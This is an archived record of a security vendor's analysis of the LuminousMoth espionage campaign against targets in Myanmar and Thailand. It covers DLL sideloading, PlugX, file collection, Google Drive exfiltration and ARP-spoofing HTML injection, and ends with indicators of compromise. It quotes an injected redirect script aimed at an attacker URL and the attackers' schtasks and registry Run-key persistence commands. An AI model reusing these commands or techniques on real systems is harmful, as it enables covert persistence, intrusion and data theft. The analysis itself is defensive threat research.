{ "id": "3b4785e5-a326-47ee-a3d9-7c0e94f092c1", "created_at": "2026-04-06T00:10:02.270173Z", "updated_at": "2026-04-10T03:36:33.428063Z", "deleted_at": null, "sha1_hash": "214bf6c0da676d094fb6f0ea1d536a20ecc9df80", "title": "LuminousMoth – PlugX, File Exfiltration and Persistence Revisited", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 134524, "plain_text": "LuminousMoth – PlugX, File Exfiltration and Persistence Revisited\r\nBy Victor VRABIE\r\nArchived: 2026-04-05 17:17:44 UTC\r\nForeword\r\nA few months ago, Bitdefender researchers started to investigate an extended operation that targeted victims from Myanmar\r\nand Thailand for what looked like cyber espionage and intelligence gathering.\r\nMany aspects of this operation were recently comprehensively described in this article by the Kaspersky team, but we\r\ndecided to present our perspective on the operation and offer other IOCs we spotted.\r\nThe investigation started with our usual triage process where we observed suspicious activity of two processes;\r\nC:\\Users\\Public\\Music\\WinWord.exe and C:\\ProgramData\\Msolutions\\svmetrics.exe . As a result, we were able to\r\nidentify an infection vector and we collected the tools and TTPs specific to this operation.\r\nWe analyzed the chain of events and traced the start of the infection on some victims to the file C:\\Users\\\r\n\u003cuser\u003e\\Downloads\\COVID-19 Case 12-11-2020(MOTC)\\COVID-19 Case 12-11-2020(1).exe , the creation of which\r\ncorresponds to 2020-11-12 08:21. This file is a legitimate WinWord.exe executable vulnerable to sideloading.\r\nThe actions on behalf of this COVID-19 Case 12-11-2020(1).exe we were able to reconstruct are:\r\nIt copies itself as C:\\Users\\Public\\Music\\WinWord.exe\r\nIt installs persistence by creating the “Microsof” key value under the Run registry assigning the\r\nC:\\Users\\Public\\Music\\WinWord.exe value\r\nIt starts communicating with the CobaltStrike C\u0026C www.updatecatalogs.com\r\nMore details on tools and TTPs can be found in the sections below.\r\nKey Findings\r\nPreviously-unreported payload in the form of the well-known Remote Access Tool PlugX\r\nData exfiltration carried through Google Drive\r\nMore tools used for data collection\r\nthe attackers perform HTML code injection using ARP spoofing to redirect the victim to a page hosted by the threat\r\nactor\r\nExtra findings suggesting that LuminousMoth is connecting to Mustang Panda\r\nSome more examples of binaries vulnerable to sideloading used in this attack\r\nSome more examples of persistence mechanisms\r\nMore IOCs associated with this operation\r\nFmtoptions.dll and Plugx\r\nWe were able to link the C:\\ProgramData\\Msolutions\\svmetrics.exe process with the\r\nC:\\Users\\Public\\Music\\WinWord.exe , and with the current operation, as we have evidence that svmetrics.exe executed\r\nmore than once the C:\\Users\\Public\\Music\\WinWord.exe file, the one that was initially copied by the COVID-19 Case 12-\r\n11-2020(1).exe alongside the malicious wwlib.dll.\r\nThe svmetrics.exe (InternalName from version info: fmtoptions.exe ) is vulnerable to sideloading and is abused to load\r\nFmtoptions.dll .\r\nAnalyzing the malicious Fmtoptions.dll file, we established that they read the content of a walk.dat file and decrypt the\r\nshellcode that is, subsequently, executed.  The shellcode is responsible for decompressing and loading the final payload, the\r\nPlugX  implant, that represents a DLL with the damaged MZ and PE magic values. More details on the recovered payloads\r\nare presented in the following table:\r\n9ed86767433b8d26e5b32a5d391f3f08f72dfafd6c7bf652e21e6af5b12b6e3b \r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 1 of 6\n\n4455a042e511f1c88f39cdd4c93c099af45493aa0cd8e3d40806ac2995da0907 \r\nIt’s worth noting that all tools and commands mentioned in the following sections are executed by the svmetrics.exe process\r\nthat hosts the PlugX implant.\r\nFile Collection\r\nDuring our research, we noticed the execution of the C:\\Users\\Public\\Downloads\\unsecapp.exe , a legitimate ESET\r\nEHttpSrv.exe file that is abused to load http_dll.dll . The sample of http_dll.dll we identified implements the file\r\ncollection feature.\r\nAfter loading the malicious DLL file, the ini file C:\\Users\\Public\\Downloads\\BITS.ini is parsed using\r\nGetPrivateProfileIntW and GetPrivateProfileStringW to obtain three parameters, as follows:\r\nAppName  KeyName  Note \r\nRAM  CreateRAM \r\nAn integer that indicates the maximum of days after the creation time of the file. If that\r\nlimit is exceeded for a file, it will not be collected. The default value is 60. \r\nRAM  ModifyRAM \r\nAn integer that indicateds the maximum of days after the last write time of the file. If\r\nthat limit is exceeded for a file, it will not be collected. The default value is 60. \r\nKINDINF  FLIN \r\nThe username targeted for exfiltration. It will recursively list folders under the C:\\Users\\\r\n\u003cusername\u003e\\. \r\nThe malware, then, creates a folder using the current time and the format string “%Y-%m-%d %H-%M-%S” in the\r\n“C:\\Users\\Public\\Downloads\\” where all files will be staged. It starts scanning for files in the folders Documents, Desktop\r\nand Downloads belonging to the specified user in the “FLIN” string. It also scans for files on all drives except the C:\\\r\ndrive and all CDROM ones.\r\nAnother technical detail worthy of note is the mechanism used to ensure that all files are unique in the staging folder. The\r\nMD5 hash for each file is calculated and it is checked if the hash is not contained in a vector with all previous hashes. If not,\r\nit will be stored in the vector and will be written into the C:\\Users\\Public\\Downloads\\Background-Intelligent-Transfer-Service.bin file as a hex string. Each time the DLL is executed, the content of the file with MD5 hashes is parsed and the\r\nvector of hashes is populated. The targeted files are those with the following extensions:\r\n.doc, .docx, .pdf, .xlsx, .exe\r\nA noteworthy turn took place on 2021-03-09 when the svmetrics.exe executed another interesting piece of malware –\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Zoom\\ZoomVideoApp.exe . The ZoomVideoApp.exe implements the same collection\r\nfunction, but with more features, as it automatically archives the staging folder and exfiltrates the files to the C\u0026C. The\r\nsample was analyzed in Kaspersky's blogpost.\r\nThere are many differences between the http_dll.dll and ZoomVideoApp.exe , but both of these samples use an ini file\r\nfor customizing the behavior, the common parameters by functionality being “meeting” and “ssb_sdk” as they are equivalent\r\nto the “CreateRAM” and “ModifyRAM”, respectively.\r\nThe deployment of the ZoomVideoApp.exe can be interpreted as an update to the collection and exfiltration mechanism, as\r\nfor the files collected by the http_dll.dll, the attackers were forced to manually archive and exfiltrate the files.\r\nFile Exfiltration\r\nThe attackers deployed another piece of malware to exfiltrate files, as we noticed the execution of a binary from an unusual\r\nlocation having an archive name and an authentication token as parameters from the command line.  The files were put into\r\nan archive created using the rar.exe utility.\r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 2 of 6\n\nThe process C:\\Kpcms\\Send1.exe was executed multiple times by the svmetrics.exe . After analysis, we concluded that\r\nthe sample uploads the files to Google Drive as it uses the endpoint https://www.googleapis.com/upload/drive/v3/files?\r\nuploadType=media to perform a simple upload. According to the documentation of the endpoint, it is used for the transfer of\r\nfiles that are smaller than 5MB. To bypass this limitation, the attackers were forced to split the archive into multiple parts\r\nand upload each one as suggested by the archives names that we encounter.\r\nThis limitation was fixed into a new version of the tool as the attackers start to use another sample,\r\nC:\\ProgramData\\Adobe\\Send3.exe , for the same purpose. The major improvement of the tool was the use of a resumable\r\nupload mechanism to upload files bigger than 5MB. New command line parameters were introduced like the one for\r\nspecifying the chunk size, which allows the uploading of the file by performing multiple HTTP PUT operations. There is\r\nalso an option for resuming an upload by specifying the UploadID and for checking if the upload was successful.\r\nAfter the deploying ZoomVideoApp.exe, the tool wasn’t seen in use anymore, probably because of the exfiltration\r\ncapabilities of the ZoomVideoApp.exe.\r\nArpSpoof and html injection\r\nAfter finding that svmetrics.exe executed the C:\\ProgramData\\Adobe\\Send3.exe and\r\nC:\\ProgramData\\Adobe\\GetChromeCookies.exe on one victim, we took a closer look on files from the\r\nC:\\ProgramData\\Adobe\\ as it seems to be a location where the attackers staged many tools. As a result, we noticed the\r\nC:\\ProgramData\\adobe\\arpspoof.exe file.\r\nOur analysis of this file found that the location path links to the attackers, and found many other details that will be\r\nmentioned below.\r\nThanks to the RTTI information, we established that the arpspoof.exe is actually a modified build of\r\nhttps://github.com/sin5678/zxarps and it was customized to receive from command line an IP and a PORT and to inject\r\na HTML code into the HTTP responses received from that IP:PORT using the ARP spoofing and packet capturing using\r\nWinpcap. The particular HTML is hardcoded into the binary itself and is similar to:\r\n\u003chtml\u003e\u003cbody\u003e\u003cscript\u003ewindow.location.href=\"http://microsoft.updatecatalogs[.]com/Microsoft Update Catalog.htm\"\u003c/script\u003e\u003c/b\r\nWe analyzed the sample and compared it with the code from GitHub, and we noticed another custom modification in the\r\nCARPSpoof::HackHtml function:\r\nAs can be seen from the image, the HTML will be injected only into the responses that have the 200-status code and don’t\r\ncontain the strings\r\n“2.58.230.5”, “content-google:” and “X-AspNet-Version: 4.0.30319\\r\\n”\r\nThe injected HTML intends to redirect the user to http://microsoft.updatecatalogs.com/Microsoft Update Catalog.htm\r\n- a web page belonging to the attackers, as the domain updatecatalogs.com is a known C\u0026C for the Cobalt Strike beacon.\r\nAnother interesting thing is the 2.58.230.5 IP and the fact that the tool skips injection into the http responses from that IP,\r\nprobably because that IP was part of the attacker’s infrastructure. Moreover, at the time of this writing, the domain\r\nnew.mmtimes.org is resolved to that IP and it is pretty similar to the mmtimes.net found in the PlugX sample. The\r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 3 of 6\n\nmmtimes.org was already mentioned in the Kaspersky report as being used in earlier operations performed by Mustang\r\nPanda, and therefore, the arpspoof.exe, the malicious URL http://microsoft.updatecatalogs[.]com/Microsoft Update\r\nCatalog.htm from the injected HTML code and the 2.58.230.5 IP address to which the domain mmtimes.org resolves\r\nto, suggest that the LuminousMoth and Mustang Panda, are connected.\r\nMore sideloading\r\nThere are certainly more tools used by actors in this operation as, beside the fmtoptions.exe, WinWord.exe and igfxEM.EXE\r\nfiles vulnerable to sideloading, we found two other vulnerable binaries abused to load a malicious DLL file.\r\nThe first case we want to address is C:\\Users\\Public\\Music\\VSTOInstaller.exe , which was executed by the same\r\nsvmetrics.exe. This sample of Visual Studio Tools for Office Solution Installer loads the vstoloader.dll and the malicious\r\nDLL loaded this way is C:\\Users\\Public\\music\\vstoloader.dll that extracts a shellcode from the ret.bin file and\r\nexecutes it. Unfortunately, we weren’t able to obtain the ret.bin file, so we don’t know what role the tool might have.\r\nBeing executed by the same svmetrics.exe process, the C:\\Intel\\install\\stay\\AtlTraceTool8.exe is another legitimate\r\nbinary abused by the attackers. The only thing we were able to establish about this binary is that it loads the malicious\r\nC:\\Intel\\install\\stay\\1033\\ AtlTraceToolUI.dll , but the file could not be obtained.\r\nPersistence\r\nThe data we gathered suggests at least two of the tools we encounter are setting up persistence:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  C:\\Users\\Public\\Music\\WinWord.exe \r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  C:\\ProgramData\\Msolutions\\svmetrics.exe \r\nWe also spotted the persistence setup via the svmetrics.exe for a few tools:\r\nschtasks.exe /create /sc onstart /ru system /tn MicrosoftOneDirve /tr C:\\Intel\\install\\stay\\AtlTraceTool8.exe\" \"-svc /F \r\nREG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Zoom\" /t REG_SZ /d \"C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\Zoom\\ZoomVideoApp.exe\" /F \r\nREG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v BGClient /t REG_SZ /d\r\n\"c:\\Users\\Public\\Music\\VSTOInstaller.exe\" /F \r\nIndicators of Compromise\r\nBinaries exploited for sideloading\r\nFile path  SHA256  Note \r\nC:\\Users\\Public\\Music\\WinWord.exe  8cfb55087fa8e4c1e7bcc580d767cf2c884c1b8c890ad240c1e7009810af6736  Winword from m\r\nthat loads wwlib\r\nC:\\ProgramData\\Msolutions\\svmetrics.exe  f9558aae2ad658885c071975a6efd055e3324717a32ddf551c5760afe766204e \r\nFmtOptions.exe\r\nSoftware Inc.; lo\r\nfmtoptions.dll \r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 4 of 6\n\nC:\\Users\\Public\\Downloads\\unsecapp.exe  c3159d4f85ceb84c4a0f7ea9208928e729a30ddda4fead7ec6257c7dd1984763 \r\nESET EHttpSrv\r\nhttp_dll.dll \r\nC:\\Users\\Public\\Music\\VSTOInstaller.exe  fc73a301bf3167cb01e966df1bb0d20ca922ea831298ab85b4301347c6b5df10 \r\nVisual Studio To\r\nSolution Installe\r\nvstoloader.dll \r\nC:\\Intel\\install\\stay\\AtlTraceTool8.exe  197d0ad8e3f6591e4493daaee9e52e53ecf192e32f9d167c67f2ffb408c76f2c \r\nMicrosoft ATL T\r\nloads\r\n1033\\AtlTraceT\r\nFiles used by attackers\r\nSHA256  Filename \r\n82134a024e98e9bde134b8294f2b346cef300202203e88229718967f52becc78  fmtoptions.dll \r\nf75457c62e1f65bfd0b16cd74cecb0325837a7b615378218bd2571818b3dcb46  fmtoptions.dll \r\nccf48d55f99a2bc1f91a92d8afa7ad61559911ff5f4e5e85cbab1177c2581d41  vstoloader.dll \r\n6f20eaca6e9fb4e91826081dd0af81e4dcc2f7c82879f8ba16dea26400963931  http_dll.dll \r\n869e7da2357c673dab14e9a64fb69691002af5b39368e6d1a3d7fda242797622  version.dll \r\n95bcc8c3d9d23289b4ff284cb685b741fe92949be35c69c1faa3a3846f1ab947  wwlib.dll \r\n37b8c0c8664763ecabaed434f98abc3ae2ac8a6a2a09dc395b46196da050c091  getchromecookies.exe \r\n11996a32e5449cca1d8e82b6c43a625913b235d57a4f3e01f560f332cb221931  getchromecookies.exe \r\nb58fdb9b77e11da524d6518634ea31c3c2d1b2625cb009781f310478e98cfb3a  Send1.exe \r\ne826209f6adccc90959bc515598eddd91b61948b115c08257b263e13882aed83  Send3.exe \r\n85d7c880f658e49a56781959e375d46861b87fcee6db17952dcb4530eb4bacd9  arpspoof.exe \r\n361ccc35f7ff405eb904910de126a5775de831b4229a4fdebfbacdd941ad3c56  ZoomVideoApp.exe \r\n9ed86767433b8d26e5b32a5d391f3f08f72dfafd6c7bf652e21e6af5b12b6e3b \r\nPlugX sample (myanmar.flymna[.]net\r\nC\u0026C address) \r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 5 of 6\n\n4455a042e511f1c88f39cdd4c93c099af45493aa0cd8e3d40806ac2995da0907 \r\nPlugX sample (webmail.mmtimes[.]net\r\nC\u0026C address) \r\nbd7a0507f10f92a14f9bbfd708d7821d036342ad78c39537fe0bebeef96f9139 \r\nCobaltStrike Beacon (103.15.28[.]195\r\nC\u0026C address) \r\nad50056093467987270b6c560734b59c35edadfbc38d76ca4d6199fc70595446 \r\nCobaltStrike Beacon\r\n(www.updatecatalogs[.]com C\u0026C\r\naddress) \r\nURL used in injected HTML code\r\nhttp://microsoft.updatecatalogs.com/Microsoft Update Catalog.htm\r\nMalicious domains\r\nmicrosoft.updatecatalogs[.]com \r\nMalicious IPs\r\nSource: https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited" ], "report_names": [ "luminousmoth-plugx-file-exfiltration-and-persistence-revisited" ], "threat_actors": [ { "id": "7c00086d-9535-4552-8201-1dd725e41b12", "created_at": "2023-04-26T02:03:03.128736Z", "updated_at": "2026-04-10T02:00:05.239152Z", "deleted_at": null, "main_name": "LuminousMoth", "aliases": [ "LuminousMoth" ], "source_name": "MITRE:LuminousMoth", "tools": [ "PlugX", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "92049df8-7902-48e8-ad17-97398b923698", "created_at": "2022-10-25T16:07:23.81315Z", "updated_at": "2026-04-10T02:00:04.757082Z", "deleted_at": null, "main_name": "LuminousMoth", "aliases": [], "source_name": "ETDA:LuminousMoth", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434202, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.pdf", "text": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.txt", "img": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.jpg" } }